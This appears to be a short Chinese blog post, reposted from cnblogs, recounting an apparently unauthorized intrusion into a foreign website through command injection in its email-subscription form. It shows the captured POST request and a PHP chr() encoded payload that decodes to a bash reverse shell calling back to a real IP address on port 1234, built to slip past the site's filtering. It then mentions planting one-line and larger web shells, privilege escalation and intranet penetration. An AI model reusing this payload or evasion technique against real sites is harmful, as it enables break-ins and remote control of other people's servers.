一次渗透小记

　　

国外的一个网站，在email订阅的地方。

抓取POST包如下：

POST /optin HTTP/1.1
Host: www.xxxxx.com
Content-Length: 11
Cache-Control: max-age=0
Origin: http://www.xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://www.xxx.com/optin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: __cfduid=d17662de4aa1101335a8d638499fcb7891466129105; proactive_chat=true; PHPSESSID=a8r8knb66465jgn73hf4n04es1; _gat=1; _ga=GA1.2.1450623371.1466129111

[email protected]&add=

也许你会说这有什么的，很正常的

我们在ls试下

 

但是过滤了单引号 逗号等，老外对XSS的开发还是有的，既然能执行system，那么就好玩了

反弹个SHELL，到这你可能想问了怎么反弹，wget?有空格，也不可以。

编码：chr(98).chr(97).chr(115).chr(104).chr(32).chr(45).chr(105).chr(32).chr(62).chr(38).chr(32).chr(47).chr(100).chr(101).chr(118).chr(47).chr(116).chr(99).chr(112).chr(47).chr(49).chr(50).chr(49).chr(46).chr(52).chr(50).chr(46).chr(49).chr(56).chr(50).chr(46).chr(50).chr(48).chr(56).chr(47).chr(49).chr(50).chr(51).chr(52).chr(32).chr(48).chr(62).chr(38).chr(49)

写个一句话，再传大马，全玩活

当然还可以继续深入，提权 内网渗透等等。

我想说的是这个漏洞很有意思，参数没有过滤可以执行去执行，不知道国内会不会犯这样的错误

 

转载于:https://www.cnblogs.com/sevck/p/5596225.html